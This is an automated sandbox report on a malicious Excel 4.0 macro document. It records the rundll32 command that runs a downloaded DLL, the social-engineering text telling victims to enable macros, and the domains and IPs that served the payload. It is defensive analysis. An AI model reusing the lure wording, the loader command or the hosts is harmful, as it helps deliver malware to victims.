
Analysis Report 85095f36_by_Libranalysis

Overview

General Information

Sample Name: 85095f36_by_Libranalysis (renamed file extension from none to xls)
Analysis ID: 412672
MD5: 85095f36d19d0a0cc635a9e255730ea0
SHA1: 8ec5f0d784134f08bce52949027a686cd099acd8
SHA256: a4a5606ff24d70f51f72a501a370ab2199548d4d3a88e904cb9cfafb824d8af2
Tags: SilentBuilder

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)


Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2484 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2512 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 1616 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2484, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 2512

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 85095f36_by_Libranalysis.xls; ReversingLabs: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe
Source: global traffic; DNS query: name: signifysystem.com
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: Joe Sandbox View; IP Address: 192.185.39.58
Source: Joe Sandbox View; IP Address: 192.185.32.232
Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: signifysystem.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown; Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown; Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown; HTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas ' RunDLL
Source: Document image extraction number: 6; Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 6; Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Found Excel 4.0 Macro with suspicious formulas
Source: 85095f36_by_Libranalysis.xls; Initial sample: CALL
Source: 85095f36_by_Libranalysis.xls; Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 85095f36_by_Libranalysis.xls; Initial sample: Sheet size: 14902
Source: 85095f36_by_Libranalysis.xls; OLE indicator, VBA macros: true
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\9DDE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRD401.tmp
Source: 85095f36_by_Libranalysis.xls; OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 85095f36_by_Libranalysis.xls; ReversingLabs: Detection: 10%
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe; Automated click: OK
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

The matrix is listed per tactic; the numbers in parentheses are the counts the matrix shows next to a technique.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Scripting (2, 1), Exploitation for Client Execution (2, 3), At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Rundll32 (1), Process Injection (1), Scripting (2, 1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: File and Directory Discovery (1), System Information Discovery (2), Query Registry, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (2), Ingress Tool Transfer (1), Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
85095f36_by_Libranalysis.xls | 7% | Virustotal |
85095f36_by_Libranalysis.xls | 11% | ReversingLabs |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
signifysystem.com | 3% | Virustotal |
fcventasyservicios.cl | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
signifysystem.com | 192.185.39.58 | true | false | | unknown
fcventasyservicios.cl | 192.185.32.232 | true | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmp | false | | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.39.58 | signifysystem.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
192.185.32.232 | fcventasyservicios.cl | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412672
Start date: 12.05.2021
Start time: 21:05:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 85095f36_by_Libranalysis (renamed file extension from none to xls)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLS@5/11@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.143.23, 2.20.143.16
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
192.185.39.58 | 0b31c0f0_by_Libranalysis.xls | malicious
192.185.39.58 | 090811fa_by_Libranalysis.xls | malicious
192.185.39.58 | 54402971_by_Libranalysis.xls | malicious
192.185.39.58 | afdab907_by_Libranalysis.xls | malicious
192.185.39.58 | 8100c344_by_Libranalysis.xls | malicious
192.185.39.58 | 32154f4c_by_Libranalysis.xls | malicious
192.185.39.58 | 9659e9a8_by_Libranalysis.xls | malicious
192.185.39.58 | 46747509_by_Libranalysis.xls | malicious
192.185.32.232 | 0b31c0f0_by_Libranalysis.xls | malicious
192.185.32.232 | 090811fa_by_Libranalysis.xls | malicious
192.185.32.232 | 54402971_by_Libranalysis.xls | malicious
192.185.32.232 | afdab907_by_Libranalysis.xls | malicious
192.185.32.232 | 8100c344_by_Libranalysis.xls | malicious
192.185.32.232 | 32154f4c_by_Libranalysis.xls | malicious
192.185.32.232 | 9659e9a8_by_Libranalysis.xls | malicious
192.185.32.232 | 46747509_by_Libranalysis.xls | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
signifysystem.com | 0b31c0f0_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 090811fa_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 54402971_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | afdab907_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 8100c344_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 32154f4c_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 9659e9a8_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 46747509_by_Libranalysis.xls | malicious | 192.185.39.58
fcventasyservicios.cl | 0b31c0f0_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 090811fa_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 54402971_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | afdab907_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 8100c344_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 32154f4c_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 9659e9a8_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232

ASN

Match: UNIFIEDLAYER-AS-1 (US)

Associated Sample Name / URL            Detection   Context
0b31c0f0_by_Libranalysis.xls            malicious   192.185.32.232
0b31c0f0_by_Libranalysis.xls            malicious   192.185.32.232
SWIFT COPY.pdf.exe                      malicious   192.185.171.219
d6U17S2KY1.exe                          malicious   67.20.76.71
statistic-482095214.xls                 malicious   192.254.186.229
statistic-482095214.xls                 malicious   192.254.186.229
090811fa_by_Libranalysis.xls            malicious   192.185.32.232
090811fa_by_Libranalysis.xls            malicious   192.185.32.232
54402971_by_Libranalysis.xls            malicious   192.185.32.232
54402971_by_Libranalysis.xls            malicious   192.185.32.232
afdab907_by_Libranalysis.xls            malicious   192.185.32.232
afdab907_by_Libranalysis.xls            malicious   192.185.32.232
70654 SSEBACIC EGYPT.exe                malicious   192.254.185.244
8100c344_by_Libranalysis.xls            malicious   192.185.32.232
8100c344_by_Libranalysis.xls            malicious   192.185.32.232
32154f4c_by_Libranalysis.xls            malicious   192.185.32.232
32154f4c_by_Libranalysis.xls            malicious   192.185.32.232
9659e9a8_by_Libranalysis.xls            malicious   192.185.32.232
46747509_by_Libranalysis.xls            malicious   192.185.32.232
46747509_by_Libranalysis.xls            malicious   192.185.32.232

JA3 Fingerprints

Match: 7dcce5b76c8b17472d024758970a406b

Associated Sample Name / URL            Detection   Context
0b31c0f0_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
Product specification.xlsx              malicious   192.185.32.232, 192.185.39.58
statistic-482095214.xls                 malicious   192.185.32.232, 192.185.39.58
090811fa_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
54402971_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
afdab907_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
7bYDInO.rtf                             malicious   192.185.32.232, 192.185.39.58
8100c344_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
32154f4c_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
46747509_by_Libranalysis.xls            malicious   192.185.32.232, 192.185.39.58
catalog-1908475637.xls                  malicious   192.185.32.232, 192.185.39.58
DHL AWB.xlsx                            malicious   192.185.32.232, 192.185.39.58
export of purchase order 7484876.xlsm   malicious   192.185.32.232, 192.185.39.58
XM7eDjwHqp.xlsm                         malicious   192.185.32.232, 192.185.39.58
QTFsui5pLN.xlsm                         malicious   192.185.32.232, 192.185.39.58
15j1TCnOiA.xlsm                         malicious   192.185.32.232, 192.185.39.58
e8eRhf3GM0.xlsm                         malicious   192.185.32.232, 192.185.39.58
Purchase Agreement.docx                 malicious   192.185.32.232, 192.185.39.58
551f47ac_by_Libranalysis.xlsm           malicious   192.185.32.232, 192.185.39.58
export of document 555091.xlsm          malicious   192.185.32.232, 192.185.39.58

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Microsoft Cabinet archive data, 59863 bytes, 1 file
Category: dropped
Size (bytes): 59863
Entropy (8bit): 7.99556910241083
Encrypted: true
SSDEEP: 1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
MD5: 15775D95513782F99CDFB17E65DFCEB1
SHA1: 6C11F8BEE799B093F9FF4841E31041B081B23388
SHA-256: 477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
SHA-512: AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
Malicious: false
Reputation: moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 893
Entropy (8bit): 7.366016576663508
Encrypted: false
SSDEEP: 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5: D4AE187B4574036C2D76B6DF8A8C1A30
SHA1: B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256: A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512: 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious: false
Reputation: high, very likely benign file
                                                                          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.1320855555941924
Encrypted: false
SSDEEP: 6:kKBNKpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:J8phZkPlE99SNxAhUeSKO
MD5: FF7BEBF8C83D37599A856D9611C79A64
SHA1: FDBB871E9994FD87766EE1BD3AE540ECEF695FC6
SHA-256: 75BF943337E820558AC3870FE9C57DB0EADA4FBB746F687629D01BC1D72B2181
SHA-512: CB3C2AE8048718A7E82AA247E83A815A8C76A783ED2BFDF652E511217A5CB2C2D67901E3F9677C486ACDEED7992B2D75C41BEBB1A7605B2ED15E45C2396AC7E0
Malicious: false
Reputation: low
                                                                          Preview: p...... ........z\.c.G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 252
Entropy (8bit): 2.9853979364525842
Encrypted: false
SSDEEP: 3:kkFklSHIKlXfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5n0:kKLIbQE1liBAIdQZV7ulPPN
MD5: 121F69A3EDA3EC35E85D769BDBA411B0
SHA1: FA29D86ED806FF85EDB6450693EA14834F787416
SHA-256: 625543A26F5EC1C2C283B9D14CEB88A149C0E1E7AB8DF5D463C4CBF07C5F47F3
SHA-512: 3A5E1AE302B59C4120442B1A48DDEAC6C12D62A880250945DE9E4975246423537728890BC8A910932F378EC70F55521827862C4EF6647C132AE62029CA36EEDE
Malicious: false
Reputation: low
                                                                          Preview: p...... ....`....x.b.G..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
C:\Users\user\AppData\Local\Temp\9CDE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 81245
Entropy (8bit): 7.906572817548327
Encrypted: false
SSDEEP: 1536:TeKmfTW8SDcn9iZtJOXAQR2KtCbuMB/yDL4D5Kzhl4AiCb/1R:TALW8SD8YZo/Uh0GUzEiX
MD5: AF4FD9CB946BB386C0CFE74CC853B894
SHA1: 5523F28714D3B968146E491A954C6587B1501CC2
SHA-256: 378B236D974C071FB4A4A22C54D0996762C4062DA9F6FA63E9B995497076F841
SHA-512: BC1B88C7D40E7369AFE025F4FAF5A1AE62568A5E512AA4E731F34A842671F63FE0302B8F625D1D02AB35D8382356956BB3435D579AC3EF8C3FD2BDF23EFB5F51
Malicious: false
Reputation: low
                                                                          Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\CabE81F.tmp
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
